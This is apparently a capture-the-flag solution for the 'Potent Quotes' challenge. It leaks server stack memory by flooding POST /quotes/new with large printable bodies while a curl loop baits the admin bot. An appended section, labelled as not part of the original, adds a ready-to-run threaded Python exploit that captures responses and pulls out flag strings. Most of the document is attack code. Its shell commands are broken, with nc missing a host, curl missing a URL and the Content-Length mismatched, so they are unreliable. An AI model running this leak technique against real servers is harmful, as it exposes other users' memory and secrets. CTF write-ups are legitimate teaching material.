Last active April 15, 2019 10:54
Solution for Potent Quotes #pctf2019
# The main issue was that null bytes were being blocked, so we needed a chunk of stack
# that did not contain any null bytes.
# The trick was to put a huge body into the POST /api/flag request so it would fill most of the stack with printable characters,
# and then just leak it.
# In terminal 1 run (leaks the stack to the file; look for the Location: header in it).
for j in {0..10}; do for i in {0..20}; do
printf "POST /quotes/new HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 9000\r\n\r\nattribute=&quote=$$$$$$$$$$$" \
| nc 1337 -q 1 >> aaa & done; sleep 1; done
# In terminals 2 and 3 run (to steal the admin's attention :P and get the flag on their behalf so it will be put on the stack).
for i in {0..20}; do curl -d 'path='; done
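The shell loop above leaves the request body short while announcing Content-Length: 9000, so a server that reads the declared length will block or truncate, and the "huge body" never reaches the stack. Below is an added example (not part of the gist) in Python that does the same job properly: it builds a POST whose body really is thousands of printable bytes with a matching Content-Length, fires the requests in parallel rounds like the nested loop, and then scans the captured responses for Location: headers and flag-shaped strings. The host, port, the PCTF{...} flag format and the sample capture at the bottom are assumptions or constructed data; the gist does not state them.

```python
import re
import socket
import string
import threading

# Constructed target values; the gist omits the host, so these are assumptions.
TARGET_HOST = "127.0.0.1"
TARGET_PORT = 1337
FLAG_RE = re.compile(rb"PCTF\{[^}\r\n]*\}")            # assumed PlaidCTF flag format
LOCATION_RE = re.compile(rb"^Location:[ \t]*([^\r\n]*)", re.M)


def printable_filler(length):
    """Bytes with no NUL/CR/LF and nothing that needs URL-encoding, so the
    whole value lands on the server's stack verbatim."""
    alphabet = (string.ascii_letters + string.digits).encode()
    return bytes(alphabet[i % len(alphabet)] for i in range(length))


def build_request(host, path, filler_len, attribute=b""):
    """Raw HTTP/1.0 POST whose Content-Length matches the body actually sent."""
    body = b"attribute=" + attribute + b"&quote=" + printable_filler(filler_len)
    head = (
        f"POST {path} HTTP/1.0\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n\r\n"
    ).encode()
    return head + body


def content_length_matches(request):
    """Sanity check: declared Content-Length equals the bytes after the header block."""
    head, _, body = request.partition(b"\r\n\r\n")
    m = re.search(rb"Content-Length:[ \t]*(\d+)", head)
    return m is not None and int(m.group(1)) == len(body)


def send_raw(host, port, request, timeout=3.0):
    """Send the request and return everything the server sends back."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        while True:
            try:
                data = s.recv(65536)
            except socket.timeout:
                break
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def leak_loop(host, port, rounds=11, per_round=21, filler_len=9000, out_path="aaa"):
    """Mirror of the gist's nested loop: per_round parallel POSTs, repeated rounds times,
    every response appended to out_path for offline inspection."""
    req = build_request(host, "/quotes/new", filler_len)
    lock = threading.Lock()

    def worker():
        try:
            resp = send_raw(host, port, req)
        except OSError:
            return
        with lock, open(out_path, "ab") as f:
            f.write(resp + b"\n")

    for _ in range(rounds):
        threads = [threading.Thread(target=worker) for _ in range(per_round)]
        for t in threads:
            t.start()
        for t in threads:
            t.join()


def extract_locations(captured):
    """All Location: header values in a capture file's contents."""
    return LOCATION_RE.findall(captured)


def find_flags(captured):
    """Flag-shaped strings anywhere in the leaked data, deduplicated in order."""
    seen, out = set(), []
    for m in FLAG_RE.findall(captured):
        if m not in seen:
            seen.add(m)
            out.append(m)
    return out


# Constructed sample capture (not real server output) so the parsing runs offline.
SAMPLE_CAPTURE = (
    b"HTTP/1.0 302 Found\r\n"
    b"Location: /quotes/42aaaaBBBBPCTF{constructed_example}\x7f\r\n"
    b"Content-Length: 0\r\n\r\n"
    b"HTTP/1.0 302 Found\r\n"
    b"Location: /quotes/43PCTF{constructed_example}\r\n\r\n"
)

if __name__ == "__main__":
    leak_loop(TARGET_HOST, TARGET_PORT)
    with open("aaa", "rb") as f:
        data = f.read()
    for loc in extract_locations(data):
        print(loc)
    print(find_flags(data))
```

Run it while the admin-baiting curl loop is going in the other terminals, then grep the capture file as the gist does; the filler is letters and digits only, so any byte outside that alphabet in a Location: value is stack content rather than your own input.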